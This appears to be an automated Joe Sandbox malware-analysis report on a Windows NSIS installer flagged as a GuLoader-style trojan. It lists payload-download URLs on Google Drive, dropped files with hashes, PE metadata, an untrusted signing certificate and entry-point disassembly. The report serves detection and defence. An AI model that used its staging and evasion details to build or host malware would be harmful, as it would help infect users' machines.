                                      https://drive.usercontent.google.com/eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://apis.google.comeAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErroreAvqHiIsgR.exefalse
                                            high
                                            https://drive.google.comZTeAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://drive.google.com/GeAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.com/aeAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                172.217.19.174
                                                drive.google.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.181.33
                                                drive.usercontent.google.comUnited States
                                                15169GOOGLEUSfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1567591
                                                Start date and time:2024-12-03 17:22:09 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 1s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:6
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:eAvqHiIsgR.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
                                                Detection:MAL
                                                Classification:mal76.troj.evad.winEXE@3/8@2/2
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 88%
                                                • Number of executed functions: 47
                                                • Number of non-executed functions: 28
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: eAvqHiIsgR.exe
                                                TimeTypeDescription
                                                11:24:48API Interceptor25x Sleep call for process: eAvqHiIsgR.exe modified
                                                No context
                                                No context
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                gJUrBC17Wh.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                9WdUhQEKvX.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                NX6BOqyG3J.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                AwMu7gR48D.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                NX6BOqyG3J.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                beNxougDFV.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 172.217.19.174
                                                • 142.250.181.33
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dllRFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                                      z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          Produkttyper.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            Impressionist.exeGet hashmaliciousGuLoaderBrowse
                                                              PAGO.exeGet hashmaliciousGuLoaderBrowse
                                                                PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Obstetricated.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.854450882766351
                                                                    Encrypted:false
                                                                    SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                                    MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                                    SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                                    SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                                    SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                                    • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                    • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                    • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                                    • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                                    • Filename: Produkttyper.exe, Detection: malicious, Browse
                                                                    • Filename: Impressionist.exe, Detection: malicious, Browse
                                                                    • Filename: PAGO.exe, Detection: malicious, Browse
                                                                    • Filename: PAGO.exe, Detection: malicious, Browse
                                                                    • Filename: Obstetricated.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):437032
                                                                    Entropy (8bit):2.6470522931567846
                                                                    Encrypted:false
                                                                    SSDEEP:3072:bSnLz72K/yG3pRsYhtRpehLG3a+slQ2huKa:oLz72xGZRsiRpe9CZslQ2huT
                                                                    MD5:53118B7494C59D46E9BFD8977F248EDA
                                                                    SHA1:2F6C3005A562EB0D187BF751D949FECC3FEA7C9E
                                                                    SHA-256:F7A37EC1F6A7E6CA0ECBD78BCC9BCC4801F233E0B5F9156A025CE5723A3D0BEB
                                                                    SHA-512:9188CB5A8A1EE5ACAAFB715C5EAEC50C187D2C7DB357AE90C1F7B51AF95E9409681A7B0D119994011F54181A81C18C09EAE6A07BD2E240B4E31185CC15422DD4
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:00008282828282007B000000001200A7A7A7A700CDCDCD000000C000000000720000FEFE000000005D5D000000DE0000D900080048480000001F1F00C40000EC00A70095950000000080009B00000083830000626262000058585800C3C3C300005100CECE001F1F1F000000AE00000000D600470000002A2A0000006E0000B8B8000000AF00005C000000000070000049000042000200000000000000C1004E000000D2D2009F9F9F9F9F9F000000ABAB00595900000086000000000000006800000C0000620000007B7B00AAAAAAAAAAAA00050505000909000000001300CC00004D4D000000000000230000002B00FB0000006000A7000000180000AFAFAF00000074000065000060000000D900606000000000000000880000000000020003002700CC007300333333000000000075757575757500A600006D6D00777777777700B500C8C8C800002D004F0000989800001400008700FFFF007800001300B40000E90000000000FF000061004C00525252520000000057009F00FF002B0000310000006868686868686868007700007B7B00000000009A9A9A9A9A00C0C0C0007800003C3C00F3F3000098989898980000000082820000B6B600000018004848484800CE0000004100B200848484004C4C4C00B7B70000D800005F001B000040000055550000000046001111110040404000
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):207640
                                                                    Entropy (8bit):7.546004720534882
                                                                    Encrypted:false
                                                                    SSDEEP:3072:ASesIpE62+wizRgXw/kibtZaVNv4rw9KKRiYeKJSulQB0ClQztX9JnJg2yJ6MKN+:AFsIpGgm/9HteKby0oQznM2Aa+
                                                                    MD5:252B537AA9192BBF6F11B925E38F0353
                                                                    SHA1:5FA65E7E8E29B9097AE0510E4D405CDC2AF764BC
                                                                    SHA-256:44A675E5F8D832568BF91CD9C6D6D393FE4B55D8FE353492CBE5CA42B8FE0002
                                                                    SHA-512:FD5EA259314B678A8506BF6C2E47A1C133882F1CDD9F4BF5C82E56AC5E67AE6ED89FAF6A635AB4EDA451074D87B02E17D14191A44E0AD8F40AA08004549ADFA3
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...............kk..=...........................W.........s............i.TT.....5.....$......a............)........._......:..............K...9............kkk.....................L.............Z...{..5....u.............................................................88..].................................................C...kk....((.......................>.....j............7777..5.............W...........111.............gggg...............hh.....................'.-............777..........W.................HHH..............."......................u..".............o..XX.......................&....AAA..33.....................I............''...............DD.........7.............................))............S...................g.d..SSS.@@......................-.............i........#............................p....q.............ee.....................................u.........w.......E.#...ooo.cc..........."..e.9..X..........a......?...66.O............<.((.......r...;;........kkkk..r.l..
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):485127
                                                                    Entropy (8bit):1.2565961974341746
                                                                    Encrypted:false
                                                                    SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                                    MD5:580D05E679E74B036B55CA8E5FF32769
                                                                    SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                                    SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                                    SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):389868
                                                                    Entropy (8bit):1.2469892412772452
                                                                    Encrypted:false
                                                                    SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                                    MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                                    SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                                    SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                                    SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):442363
                                                                    Entropy (8bit):1.2533707838755617
                                                                    Encrypted:false
                                                                    SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                                    MD5:5465B75724C031B21C018F7D72941F72
                                                                    SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                                    SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                                    SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                                    Malicious:false
                                                                    Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):521
                                                                    Entropy (8bit):4.284169749449499
                                                                    Encrypted:false
                                                                    SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                                    MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                                    SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                                    SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                                    SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                                    Malicious:false
                                                                    Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                                    Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):734
                                                                    Entropy (8bit):3.275980440700818
                                                                    Encrypted:false
                                                                    SSDEEP:12:8wl01sXU1mGlnEERNEf3w/g/rNJkKAh4t2YZ/elFlSJm:82ovRNj/45HALqy
                                                                    MD5:24AC4E1AE1AD82FBCFB5C552050068BB
                                                                    SHA1:D74C04463D2C81957E7EC4ACC2A828BE5AB3CC01
                                                                    SHA-256:F07C4A5A2C36AE7849EFE287B88923A16243170F6DF8B22E11BA6219EC699AE6
                                                                    SHA-512:7FFC3544DB729F30C9739BAAC11490D8E13AE7E23DAA164A2DEFE148A5E454272DA61FD921F427856D37DC2F68F764170990D2C920268352FAFCC2DFF9B81CBC
                                                                    Malicious:false
                                                                    Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.540997501747662
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:eAvqHiIsgR.exe
                                                                    File size:882'600 bytes
                                                                    MD5:61518cfded3109fac04ee916ab275c26
                                                                    SHA1:c624a4ee78183d82fb8264f74953d32ddcae5481
                                                                    SHA256:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
                                                                    SHA512:478737a68a76e03b10e477a47115eb643e9c7242e5a5d7ef0c635060cb0318fd185c6be59793ba66057f811d6f623c68daabd5dfddcc8c3d4dc4d9b8be7096af
                                                                    SSDEEP:24576:yiGFaq43NvC7kHJTPrbG4ujTrlq8e+xfJ/QOeaq:yiGFu3Nv3HJTkdde+tJ/qaq
                                                                    TLSH:11151266F700D89AE8758F31982EC146E7E4BE2918641B5B3F9ABF2FBCB2050D10F515
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                                    Icon Hash:0e13672535353f1c
                                                                    Entrypoint:0x403348
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                    Error Number:-2146762487
                                                                    Not Before, Not After
                                                                    • 11/02/2024 10:37:17 10/02/2027 10:37:17
                                                                    Subject Chain
                                                                    • CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:07F4C9648CE525564FACE18D1081137B
                                                                    Thumbprint SHA-1:B05FDEA76018F6B4F74CA880D732D7C4CFAE9B3A
                                                                    Thumbprint SHA-256:3F87A7BAF788D5593E84370B6F3D6C86548799431B126CFF6183A98F77C743B6
                                                                    Serial:569C0070FED303446D97771BD262BA0ED17A9696
                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 0040A198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004080B8h]
                                                                    call dword ptr [004080BCh]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [0042F42Ch], eax
                                                                    je 00007FA2CC8C7AC3h
                                                                    push ebx
                                                                    call 00007FA2CC8CAC26h
                                                                    cmp eax, ebx
                                                                    je 00007FA2CC8C7AB9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082A0h
                                                                    push esi
                                                                    call 00007FA2CC8CABA2h
                                                                    push esi
                                                                    call dword ptr [004080CCh]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007FA2CC8C7A9Dh
                                                                    push 0000000Bh
                                                                    call 00007FA2CC8CABFAh
                                                                    push 00000009h
                                                                    call 00007FA2CC8CABF3h
                                                                    push 00000007h
                                                                    mov dword ptr [0042F424h], eax
                                                                    call 00007FA2CC8CABE7h
                                                                    cmp eax, ebx
                                                                    je 00007FA2CC8C7AC1h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007FA2CC8C7AB9h
                                                                    or byte ptr [0042F42Fh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408038h]
                                                                    push ebx
                                                                    call dword ptr [00408288h]
                                                                    mov dword ptr [0042F4F8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 00429850h
                                                                    call dword ptr [0040816Ch]
                                                                    push 0040A188h
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd63f80x13b0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                                    RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                                    RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                                    RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                                    RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                                    RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
                                                                    RT_ICON0x94ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5149377593360995
                                                                    RT_ICON0x975980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5457317073170732
                                                                    RT_ICON0x986400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6073770491803279
                                                                    RT_ICON0x98fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                                    RT_DIALOG0x994300x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x995300x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x996500xc4dataEnglishUnited States0.5918367346938775
                                                                    RT_DIALOG0x997180x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x997780x92Targa image data - Map 32 x 12490 x 1 +1EnglishUnited States0.7191780821917808
                                                                    RT_VERSION0x998100x27cdataEnglishUnited States0.5
                                                                    RT_MANIFEST0x99a900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                    DLLImport
                                                                    ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
